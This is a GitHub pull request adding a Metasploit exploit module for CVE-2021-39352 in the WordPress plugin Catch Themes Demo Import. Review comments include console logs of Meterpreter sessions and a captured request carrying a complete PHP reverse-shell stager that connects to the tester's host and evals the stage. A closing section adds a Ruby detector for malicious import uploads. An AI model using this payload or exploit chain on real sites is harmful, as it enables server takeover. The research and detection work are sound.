Wordpress Plugin Catch Themes Demo Import cve-2021-39352 #15988

Merged: 3 commits, Jan 4, 2022

Conversation

@h00die h00die commented Dec 22, 2021

This PR adds cve-2021-39352, an authenticated WordPress plugin RCE against Catch Themes Demo Import < 1.8.
Pretty simple exploit: login, grab a nonce, upload payload, execute it. Have a nice day.

Looks like the plugin doesn't have a good readme file though, so the check does find a file, but not the version. This is prob fine. I think in the future it may be a good idea to implement an authenticated check_plugin_version_from_plugin_page to check from the authenticated pages. Another PR on another day.

Also went ahead and updated the WordPress themes and plugins files.

Verification

@space-r7 space-r7 left a comment

Code looks good to me. Added a suggestion to mention authentication as a requirement for exploitation in docs / module description.

@space-r7 space-r7 self-assigned this Jan 3, 2022
space-r7 commented Jan 3, 2022

I've gotten a successful session a few times, but I'm getting a few failures as well:

msf6 > use exploit/multi/http/wp_catch_themes_demo_import
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_catch_themes_demo_import) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(multi/http/wp_catch_themes_demo_import) > set rhost 192.168.140.238
rhost => 192.168.140.238
msf6 exploit(multi/http/wp_catch_themes_demo_import) > set password password
password => password
msf6 exploit(multi/http/wp_catch_themes_demo_import) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Could not identify the version number
[-] Exploit aborted due to failure: unexpected-reply: Failed to upload payload
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/wp_catch_themes_demo_import) > rerun
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Could not identify the version number
[*] Triggering payload at wp-content/uploads/2022/1/TrjxIRaZHgnN.php
[*] Sending stage (39282 bytes) to 192.168.140.238
[+] Deleted TrjxIRaZHgnN.php
[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.238:48768 ) at 2022-01-03 14:26:39 -0600



meterpreter > getuid
Server username: www-data
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.140.238 - Meterpreter session 1 closed.  Reason: Died
msf6 exploit(multi/http/wp_catch_themes_demo_import) > rerun
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Could not identify the version number
[-] Exploit aborted due to failure: unexpected-reply: Failed to upload payload
[*] Exploit completed, but no session was created.
Failure with HTTPTRACE output
####################
# Request:
####################
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 192.168.140.238
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Cookie: wordpress_test_cookie=WP%20Cookie%20check; wordpress_5c016e8f0f95f039102cbe8366c5c7f3=admin%7C1641414740%7CovG0DgwKUk7OHlmsoKuS19fTZkeKBYy2gdNAx9AnAwq%7C6c118c265d0835aa02c3ded8408128e9d0e1a22083414ff7f2ed98acdcaee39b; wordpress_5c016e8f0f95f039102cbe8366c5c7f3=admin%7C1641414740%7CovG0DgwKUk7OHlmsoKuS19fTZkeKBYy2gdNAx9AnAwq%7C6c118c265d0835aa02c3ded8408128e9d0e1a22083414ff7f2ed98acdcaee39b; wordpress_logged_in_5c016e8f0f95f039102cbe8366c5c7f3=admin%7C1641414740%7CovG0DgwKUk7OHlmsoKuS19fTZkeKBYy2gdNAx9AnAwq%7C3d5e52aef19b004e3d1a4370175ae7e7563dcd05d3ddab69dd9fd6e233c20d85;
Content-Type: multipart/form-data; boundary=_Part_12_663569196_2631884551
Content-Length: 1595

--_Part_12_663569196_2631884551
Content-Disposition: form-data; name="action"

ctdi_import_demo_data
--_Part_12_663569196_2631884551
Content-Disposition: form-data; name="security"

2b7717075d
--_Part_12_663569196_2631884551
Content-Disposition: form-data; name="selected"

undefined
--_Part_12_663569196_2631884551
Content-Disposition: form-data; name="content_file"; filename="bgMJ1R82UV.php"
Content-Type: application/x-php

/*<?php /**/ error_reporting(0); $ip = '192.168.140.1'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
--_Part_12_663569196_2631884551--

####################
# Response:
####################
HTTP/1.1 200 OK
Date: Mon, 03 Jan 2022 20:32:21 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Content-Length: 31
Content-Type: application/json; charset=UTF-8

{"status":"afterAllImportAJAX"}
[-] Exploit aborted due to failure: unexpected-reply: Failed to upload payload
[*] Exploit completed, but no session was created.

Edit: It might be an issue with my setup since waiting a minute or two before retrying gives another session. Just wanted to check if you've run into this error before.

h00die commented Jan 4, 2022

I didn't experience this before, but can confirm the afterAllImportAJAX thing.
https://support.shufflehound.com/forums/topic/i-cant-use-the-one-click-demo-installer/#post-31770 seems related, but being 3 yrs old and 'fixed' I'm not sure if it's related or not.

Being that I was able to confirm what you did, I adjusted docs and error handling to account for this.

h00die commented Jan 4, 2022

I don't think the rspec issues are related to this module.

space-r7 commented Jan 4, 2022

Thanks for the changes! I modified the print_status() call to show the full path to the payload. Will go ahead and land since the spec failures have nothing to do with this PR.

msf6 > use exploit/multi/http/wp_catch_themes_demo_import
[*] Using configured payload php/meterpreter/reverse_tcp
msf6 exploit(multi/http/wp_catch_themes_demo_import) > set rhost 192.168.140.238
rhost => 192.168.140.238
msf6 exploit(multi/http/wp_catch_themes_demo_import) > set lhost 192.168.140.1
lhost => 192.168.140.1
msf6 exploit(multi/http/wp_catch_themes_demo_import) > set password password
password => password
msf6 exploit(multi/http/wp_catch_themes_demo_import) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Could not identify the version number
[*] Triggering payload at wp-content/uploads/2022/01/BC9gSc7X.php
[*] Sending stage (39282 bytes) to 192.168.140.238
[+] Deleted BC9gSc7X.php
[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.238:50112 ) at 2022-01-04 14:37:37 -0600

meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 5.11.0-43-generic #47~20.04.2-Ubuntu SMP Mon Dec 13 11:06:56 UTC 2021 x86_64
Meterpreter : php/linux
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.140.238 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(multi/http/wp_catch_themes_demo_import) > run

[*] Started reverse TCP handler on 192.168.140.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Could not identify the version number
[-] Exploit aborted due to failure: unexpected-reply: Plugin not ready to process new payloads. Please retry in a few minutes.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/wp_catch_themes_demo_import) >

space-r7 added a commit that referenced this pull request Jan 4, 2022
@space-r7 space-r7 merged commit c6372ec into rapid7:master Jan 4, 2022
@space-r7 space-r7 added the rn-modules release notes for new or majorly enhanced modules label Jan 4, 2022
space-r7 commented Jan 4, 2022

Release Notes

This adds an exploit for the Catch Themes Demo Import WordPress plugin for versions below 1.8. The functionality for importing a theme does not properly sanitize file formats, allowing an authenticated user to upload a PHP payload. Requesting the uploaded file achieves code execution as the user running the web server.
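The HTTPTRACE earlier in the thread and the release note above describe the same defect from two sides: the import handler behind action=ctdi_import_demo_data accepts a content_file of any format, so a .php upload lands under wp-content/uploads. The Ruby below is an added example, not code from this PR, the Metasploit module, or the plugin. It parses a captured multipart request to admin-ajax.php and flags an import whose file part is executable rather than demo content; the same check is what the plugin's import should perform before saving the upload. The allow-list of demo-content extensions is an assumption, and the boundary, nonce and file names in the constructed sample are placeholders rather than values from the page.

```ruby
# Added example (not the Metasploit module's or the plugin's own code).
# Flags a Catch Themes Demo Import request whose content_file is a script.

# Action name as seen in the PR's HTTPTRACE.
DEMO_IMPORT_ACTION = 'ctdi_import_demo_data'.freeze
# Assumption: legitimate demo content is an export file, never a script.
ALLOWED_EXTENSIONS = %w[xml json wie dat].freeze
# Extensions a PHP-capable web server may execute (conservative list).
EXECUTABLE_EXTENSIONS = %w[php php3 php4 php5 php7 phtml phar].freeze

# Minimal multipart/form-data parser: one hash per part with lower-cased
# headers, the extracted :name / :filename, and the raw :data.
def parse_multipart(body, boundary)
  parts = []
  body.split("--#{boundary}").each do |chunk|
    chunk = chunk.sub(/\A\r?\n/, '')                 # CRLF after each delimiter
    next if chunk.empty? || chunk.start_with?('--')   # preamble or closing "--"
    headers, _sep, data = chunk.partition(/\r?\n\r?\n/)
    part = { data: data.sub(/\r?\n\z/, '') }           # CRLF before next delimiter
    headers.each_line do |line|
      name, _colon, value = line.strip.partition(':')
      part[name.downcase] = value.strip
    end
    disposition = part['content-disposition'].to_s
    part[:name] = disposition[/(?:\A|;\s*)name="([^"]*)"/, 1]
    part[:filename] = disposition[/filename="([^"]*)"/, 1]
    parts << part
  end
  parts
end

# Classify one request body. Returns :not_demo_import for other AJAX actions,
# :no_file when the import carries nothing, otherwise :benign or :suspicious
# with the list of reasons that fired.
def classify_import_request(body, boundary)
  by_name = parse_multipart(body, boundary).to_h { |p| [p[:name], p] }
  action = by_name['action']
  return { verdict: :not_demo_import } unless action && action[:data] == DEMO_IMPORT_ACTION

  file = by_name['content_file']
  return { verdict: :no_file } unless file && file[:filename]

  ext = File.extname(file[:filename]).delete_prefix('.').downcase
  content_type = file['content-type'].to_s.downcase
  reasons = []
  reasons << "executable extension .#{ext}" if EXECUTABLE_EXTENSIONS.include?(ext)
  reasons << "extension .#{ext} is not a demo-content format" unless ALLOWED_EXTENSIONS.include?(ext)
  reasons << "declared content type #{content_type}" if content_type.include?('php')
  # "<?xml" must not trigger this; only PHP open tags do.
  reasons << 'body contains a PHP open tag' if file[:data].match?(/<\?(php\b|=)/i)
  { verdict: reasons.empty? ? :benign : :suspicious, filename: file[:filename], reasons: reasons }
end

# Builds a constructed request with the field layout of the PR's HTTPTRACE
# (action, security nonce, selected, content_file). Nonce is a placeholder.
def build_import_request(boundary, filename:, content_type:, data:)
  [
    "--#{boundary}", 'Content-Disposition: form-data; name="action"', '', DEMO_IMPORT_ACTION,
    "--#{boundary}", 'Content-Disposition: form-data; name="security"', '', 'placeholder_nonce',
    "--#{boundary}", 'Content-Disposition: form-data; name="selected"', '', 'undefined',
    "--#{boundary}", "Content-Disposition: form-data; name=\"content_file\"; filename=\"#{filename}\"",
    "Content-Type: #{content_type}", '', data,
    "--#{boundary}--", ''
  ].join("\r\n")
end

if __FILE__ == $PROGRAM_NAME
  boundary = '----constructed_boundary_42'
  samples = [
    build_import_request(boundary, filename: 'upload.php', content_type: 'application/x-php',
                                   data: '<?php /* constructed placeholder */ ?>'),
    build_import_request(boundary, filename: 'demo-content.xml', content_type: 'text/xml',
                                   data: '<?xml version="1.0"?><rss version="2.0"></rss>')
  ]
  samples.each do |body|
    result = classify_import_request(body, boundary)
    puts "#{result[:filename]}: #{result[:verdict]} #{result[:reasons].inspect}"
  end
end
```

Run as a script it prints one verdict per constructed sample. The extension, declared content type and body are checked independently because each can be spoofed on its own: a renamed .phtml with a text/xml content type still fails the extension checks, and a .php with an innocuous content type still fails on the body. A plugin-side fix would apply the same allow-list before moving the upload into wp-content/uploads, and a web-server rule denying PHP execution under that directory removes the impact even when a file slips through.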

@h00die h00die deleted the cve_2021_39352 branch January 5, 2022 13:28
Labels: docs, module, rn-modules (release notes for new or majorly enhanced modules)